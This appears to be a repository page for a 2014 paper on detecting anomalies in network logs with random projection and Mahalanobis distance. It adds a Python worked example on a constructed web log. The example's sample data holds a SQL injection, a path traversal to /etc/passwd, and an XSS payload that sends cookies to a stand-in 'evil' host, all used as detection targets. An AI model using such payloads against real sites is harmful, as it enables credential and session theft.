An Efficient Network Log Anomaly Detection System using Random Projection Dimensionality Reduction
Juvonen, A., & Hämäläinen, T. (2014). An Efficient Network Log Anomaly Detection System using Random Projection Dimensionality Reduction. In M. Badra, & O. Alfandi (Eds.), 2014 6th International Conference on New Technologies, Mobility and Security (NTMS) : Proceedings of NTMS'2014 Conference and Workshops. IEEE. https://doi.org/10.1109/NTMS.2014.6814006
Date
2014
Copyright
© IEEE. This is the authors' postprint version of the article. The original print version is available online at http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814006&isnumber=6813963
Abstract
Network traffic volumes keep growing, and network services are becoming more complex and more exposed to attack. Intrusion detection systems are used to protect these networks. Signature-based intrusion detection cannot detect previously unknown attacks, which is why anomaly detection is needed; however, many proposed anomaly detection systems are slow and complicated. We propose a log anomaly detection framework that aims to enable quick anomaly detection and also provides visualizations of the network traffic structure. The system preprocesses network logs into a numerical data matrix, reduces the dimensionality of this matrix using random projection, and uses the Mahalanobis distance to find outliers and calculate an anomaly score for each data point. Log lines whose anomaly score exceeds a threshold are flagged as anomalies. The system is tested with real-world network data, and actual intrusion attempts are found. In addition, visualizations are created to represent the structure of the network data. We also evaluate computational time to ensure that the performance is feasible. The system is fast, finds real intrusion attempts, and does not need clean training data.
...
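The pipeline the abstract describes, run end to end on a constructed access log, as an added worked example (not code from the paper or its authors). Everything below the log lines is an assumption made for the example: the numerical matrix is built from character 2-gram counts of the request URI (the authors' related work listed on this page uses 2-gram features, but this paper's exact preprocessing is not on the page), the random projection matrix is Gaussian, the mean and covariance are estimated from all rows including the attacks, and the anomaly threshold is mean + 2 standard deviations of the scores. The log lines themselves are constructed, not real traffic.

```python
import math
import random
import re
from collections import Counter

# --- Constructed sample log (not data from the paper) -------------------------
# Ordinary requests repeat, as traffic to a small site does; the three URIs in
# ATTACK_URIS are the intrusion attempts the scoring should surface.
def _line(ip, uri):
    return f'{ip} - - [12/Mar/2014:10:01:00 +0200] "GET {uri} HTTP/1.1" 200 1024'

NORMAL_URIS = (["/index.html"] * 8 + ["/about.html"] * 6 + ["/images/logo.png"] * 6
               + [f"/news/view?id={i}" for i in (12, 13, 14, 15) for _ in range(4)])
ATTACK_URIS = [
    "/news/view?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users--",  # SQL injection
    "/../../../../../../etc/passwd%00.html",                                     # path traversal
    "/news/view?id=%3Cscript%3Elocation=%27http://evil/%27%2Bdocument.cookie%3C/script%3E",  # XSS
]
LOG_LINES = ([_line(f"10.0.0.{i}", u) for i, u in enumerate(NORMAL_URIS)]
             + [_line(f"198.51.100.{i}", u) for i, u in enumerate(ATTACK_URIS)])

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def request_uri(line):
    """Pull the request URI out of a common-log-format line ('' if it has none)."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else ""

def feature_matrix(lines):
    """Step 1: one row per log line, one column per character 2-gram of the URI (raw counts).
    Assumed featurisation; the page only says the logs become a numerical matrix."""
    grams = [Counter(u[i:i + 2] for i in range(len(u) - 1)) for u in map(request_uri, lines)]
    vocab = sorted(set().union(*grams))
    return [[float(g[v]) for v in vocab] for g in grams], vocab

def random_projection(X, k, seed=0):
    """Step 2: multiply by a d x k Gaussian matrix with N(0, 1/k) entries, so that
    Euclidean distances are preserved in expectation while d (hundreds of 2-grams
    here, thousands on real logs) shrinks to k."""
    rng = random.Random(seed)
    d = len(X[0])
    R = [[rng.gauss(0.0, 1.0 / math.sqrt(k)) for _ in range(k)] for _ in range(d)]
    return [[sum(x[j] * R[j][c] for j in range(d)) for c in range(k)] for x in X]

def _invert(M):
    """Gauss-Jordan inverse with partial pivoting for the small k x k covariance."""
    n = len(M)
    A = [row[:] + [1.0 if i == j else 0.0 for j in range(n)] for i, row in enumerate(M)]
    for c in range(n):
        p = max(range(c, n), key=lambda r: abs(A[r][c]))
        A[c], A[p] = A[p], A[c]
        piv = A[c][c]
        A[c] = [v / piv for v in A[c]]
        for r in range(n):
            if r != c and A[r][c] != 0.0:
                f = A[r][c]
                A[r] = [rv - f * cv for rv, cv in zip(A[r], A[c])]
    return [row[n:] for row in A]

def mahalanobis_scores(Y, ridge=1e-12):
    """Step 3: squared Mahalanobis distance of every projected row from the sample
    mean/covariance of ALL rows. There is no clean training set: the attacks are in
    the data the statistics are estimated from, which is the property the abstract
    claims. `ridge` only guards against a singular covariance."""
    n, k = len(Y), len(Y[0])
    mu = [sum(col) / n for col in zip(*Y)]
    C = [[y[i] - mu[i] for i in range(k)] for y in Y]          # centred rows
    S = [[sum(c[i] * c[j] for c in C) / (n - 1) + (ridge if i == j else 0.0)
          for j in range(k)] for i in range(k)]
    Sinv = _invert(S)
    return [sum(c[i] * Sinv[i][j] * c[j] for i in range(k) for j in range(k)) for c in C]

def detect_anomalies(lines, k=9, seed=0, n_std=2.0):
    """Run the pipeline and flag lines whose score exceeds mean + n_std * std
    (an assumed threshold rule; the paper's exact rule is not on this page).
    Returns (scores, threshold, indices of flagged lines)."""
    X, _ = feature_matrix(lines)
    scores = mahalanobis_scores(random_projection(X, k, seed))
    mean = sum(scores) / len(scores)
    std = math.sqrt(sum((s - mean) ** 2 for s in scores) / len(scores))
    threshold = mean + n_std * std
    return scores, threshold, [i for i, s in enumerate(scores) if s > threshold]

if __name__ == "__main__":
    scores, threshold, flagged = detect_anomalies(LOG_LINES)
    print(f"{len(LOG_LINES)} lines, threshold {threshold:.2f}")
    for i in flagged:
        print(f"{scores[i]:7.2f}  {request_uri(LOG_LINES[i])}")
```

Two things worth knowing when reading the output. First, the squared Mahalanobis distances computed from the sample mean and covariance always sum to (n - 1) * k, so they are relative scores: an anomaly only stands out by taking a large share of a fixed total, which is why the threshold has to be derived from the scores themselves rather than fixed in advance, and why a log in which attacks are a large fraction of the lines will hide them (the covariance stretches to cover them). Second, the raw 2-gram matrix here has far more columns than rows, so its covariance is singular and the Mahalanobis distance cannot be computed on it at all; the projection is what makes the distance defined, and on real logs with thousands of distinct 2-grams it is also where the speed comes from. With this tiny constructed sample there are only 10 distinct requests, so k = 9 already captures all the variance and each score is determined by how often its request repeats (a one-off benign request would be flagged just as readily); on real data one picks k much smaller than n and a line is only unusual if its projected 2-gram profile is unusual.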
Publisher
IEEE
Parent publication ISBN
978-1-4799-3223-8
Conference
IFIP International Conference on New Technologies, Mobility and Security
Is part of
2014 6th International Conference on New Technologies, Mobility and Security (NTMS) : Proceedings of NTMS'2014 Conference and Workshops
Publication in the research information system
https://converis.jyu.fi/converis/portal/detail/Publication/23636414
Related items
Showing items with a similar title or keywords.
- Dimensionality reduction framework for detecting anomalies from network logs
  Sipola, Tuomo; Juvonen, Antti; Lehtonen, Joel (CRL Publishing, 2012). Dynamic web services are vulnerable to a multitude of intrusions that could be previously unknown. Server logs contain vast amounts of information about network traffic, and finding attacks from these logs improves the ...
- Anomaly detection from network logs using diffusion maps
  Sipola, Tuomo; Juvonen, Antti; Lehtonen, Joel (Springer, 2011). The goal of this study is to detect anomalous queries from network logs using a dimensionality reduction framework. The frequencies of 2-grams in queries are extracted to a feature matrix. Dimensionality reduction is done ...
- Adaptive framework for network traffic classification using dimensionality reduction and clustering
  Juvonen, Antti; Sipola, Tuomo (IEEE, 2012). Information security has become a very important topic, especially during the last years. Web services are becoming more complex and dynamic. This offers new possibilities for attackers to exploit vulnerabilities by inputting ...
- Online anomaly detection using dimensionality reduction techniques for HTTP log analysis
  Juvonen, Antti; Sipola, Tuomo; Hämäläinen, Timo (Elsevier BV * North-Holland; International Council for Computer Communications, 2015). Modern web services face an increasing number of new threats. Logs are collected from almost all web servers, and for this reason analyzing them is beneficial when trying to prevent intrusions. Intrusive behavior often ...
- Anomaly-based online intrusion detection system as a sensor for cyber security situational awareness system
  Kokkonen, Tero (University of Jyväskylä, 2016). Almost all organisations and even individuals rely on complex structures of data networks and networked computer systems. That complex data ensemble, the cyber domain, provides great opportunities, but at the same ...
Unless otherwise stated, publicly available JYX metadata (excluding abstracts) may be freely reused under the CC0 license.